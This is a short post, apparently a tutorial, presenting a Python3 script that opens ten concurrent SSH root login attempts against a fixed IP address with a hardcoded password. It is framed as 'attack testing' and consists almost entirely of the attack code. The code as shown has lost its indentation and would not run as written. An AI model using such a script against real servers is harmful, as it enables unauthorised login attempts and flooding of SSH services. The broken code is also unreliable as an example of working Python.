Performing a Concurrent SSH Connection Attack using Python3 threading
Below is an example code to perform simultaneous SSH connection attack testing using Python3 threading.
def ssh_connect(i):
from pexpect import pxssh
try:
s = pxssh.pxssh()
if not s.login('12.34.56.78', 'root', 'P@rol0m'):
print("SSH connection failed!")
else:
print("SSH logged in")
s.logout()
except Exception as e:
print("Error: {}".format(e))
for i in range(10):
from threading import Thread
t = Thread(target=ssh_connect, args=(i,))
t.start()
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